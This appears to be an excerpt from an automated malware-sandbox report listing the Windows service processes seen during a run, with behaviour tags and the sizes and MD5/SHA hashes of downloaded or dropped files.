C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:3172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:5080
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
3KB
MD5ae2060de016fcd7d673c3f5a9b61763a
SHA15ac1a40adddb1f30bbfa830bf9e0dad759676ae8
SHA256c5cd610bbff6373d150643e87fe2521120fac5eb4f5d23a819772ad71cd2c155
SHA5126172fdfa9cfdf108362a27ab931e351e53d5b24d05e5bd68c74a3f2771f9cd00725e7c834871a87c184c8066a2af218ca3eaa9275ead1e93484b79093172f4f9
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
171B
MD5ee23999f4ed54f681762ecbb38cba7e3
SHA189809d1812347d504f3929c7e191cbf80f8b1b06
SHA2562415e2ab1d9fd153afcba1b18790d7d9e77138937222833d1c304731e56aae6d
SHA5125678ae73c872e06eeb4fe0b71515b7fe4d3c1e6736b99405e16d02162f9efdecc93d400bfb9ceefdb5dc8841513f83908fb62df9cbf4dff7e3f7ea5233fca3bf
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b